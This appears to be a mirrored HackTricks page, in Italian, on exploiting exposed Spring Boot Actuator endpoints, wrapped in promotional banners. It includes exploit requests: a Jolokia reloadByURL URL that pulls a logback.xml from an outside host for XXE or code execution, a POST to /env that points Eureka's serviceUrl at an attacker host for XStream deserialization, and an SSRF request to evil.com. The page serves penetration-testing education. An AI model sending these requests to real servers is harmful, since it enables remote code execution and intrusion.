mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-27 07:01:09 +00:00
5.8 KiB
5.8 KiB
Spring Actuators
Impara l'hacking di AWS da zero a eroe con htARTE (HackTricks AWS Red Team Expert)!
Altri modi per supportare HackTricks:
- Se vuoi vedere la tua azienda pubblicizzata in HackTricks o scaricare HackTricks in PDF Controlla i PACCHETTI DI ABBONAMENTO!
- Ottieni il merchandising ufficiale di PEASS & HackTricks
- Scopri The PEASS Family, la nostra collezione di NFT esclusivi
- Unisciti al 💬 gruppo Discord o al gruppo Telegram o seguici su Twitter 🐦 @carlospolopm.
- Condividi i tuoi trucchi di hacking inviando PR ai repository di HackTricks e HackTricks Cloud su GitHub.
Bypass di autenticazione di Spring
Da https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png****
Sfruttare Spring Boot Actuators
Controlla il post originale da [https://www.veracode.com/blog/research/exploiting-spring-boot-actuators]
Punti chiave:
- Gli Actuators di Spring Boot registrano endpoint come
/health
,/trace
,/beans
,/env
, ecc. Nelle versioni da 1 a 1.4, questi endpoint sono accessibili senza autenticazione. Dalla versione 1.5 in poi, solo/health
e/info
non sono sensibili per impostazione predefinita, ma gli sviluppatori spesso disabilitano questa sicurezza. - Certi endpoint di Actuator possono esporre dati sensibili o consentire azioni dannose:
/dump
,/trace
,/logfile
,/shutdown
,/mappings
,/env
,/actuator/env
,/restart
e/heapdump
.- In Spring Boot 1.x, gli actuators sono registrati sotto l'URL radice, mentre in 2.x, sono sotto il percorso di base
/actuator/
.
Tecniche di sfruttamento:
- Esecuzione remota di codice tramite '/jolokia':
- L'endpoint
/jolokia
di Actuator espone la libreria Jolokia, che consente l'accesso HTTP alle MBean. - L'azione
reloadByURL
può essere sfruttata per ricaricare le configurazioni di logging da un URL esterno, il che può portare a XXE cieco o esecuzione remota di codice tramite configurazioni XML create ad hoc. - Esempio di URL di exploit:
http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml
.
- Modifica della configurazione tramite '/env':
- Se sono presenti le librerie di Spring Cloud, l'endpoint
/env
consente la modifica delle proprietà ambientali. - Le proprietà possono essere manipolate per sfruttare vulnerabilità, come la vulnerabilità di deserializzazione XStream nel serviceURL di Eureka.
- Esempio di richiesta POST di exploit:
POST /env HTTP/1.1
Host: 127.0.0.1:8090
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
eureka.client.serviceUrl.defaultZone=http://artsploit.com/n/xstream
- Altre impostazioni utili:
- Proprietà come
spring.datasource.tomcat.validationQuery
,spring.datasource.tomcat.url
espring.datasource.tomcat.max-active
possono essere manipolate per vari exploit, come l'iniezione SQL o la modifica delle stringhe di connessione al database.
Informazioni aggiuntive:
- Un elenco completo degli actuators predefiniti può essere trovato qui.
- L'endpoint
/env
in Spring Boot 2.x utilizza il formato JSON per la modifica delle proprietà, ma il concetto generale rimane lo stesso.
Argomenti correlati:
- Env + H2 RCE:
- Dettagli sull'utilizzo combinato dell'endpoint
/env
e del database H2 possono essere trovati qui.
- SSRF su Spring Boot tramite interpretazione errata del nome del percorso:
- La gestione dei parametri di matrice (
;
) nei nomi dei percorsi HTTP del framework Spring può essere sfruttata per Server-Side Request Forgery (SSRF). - Esempio di richiesta di exploit:
GET ;@evil.com/url HTTP/1.1
Host: target.com
Connection: close
Impara l'hacking di AWS da zero a eroe con htARTE (HackTricks AWS Red Team Expert)!
Altri modi per supportare HackTricks:
- Se vuoi vedere la tua azienda pubblicizzata in HackTricks o scaricare HackTricks in PDF Controlla i PACCHETTI DI ABBONAMENTO!
- Ottieni il merchandising ufficiale di PEASS & HackTricks
- Scopri The PEASS Family, la nostra collezione di NFT esclusivi
- Unisciti al 💬 gruppo Discord o al gruppo Telegram o seguici su Twitter 🐦 @carlospolopm.
- Condividi i tuoi trucchi di hacking inviando PR ai repository di HackTricks e HackTricks Cloud su GitHub.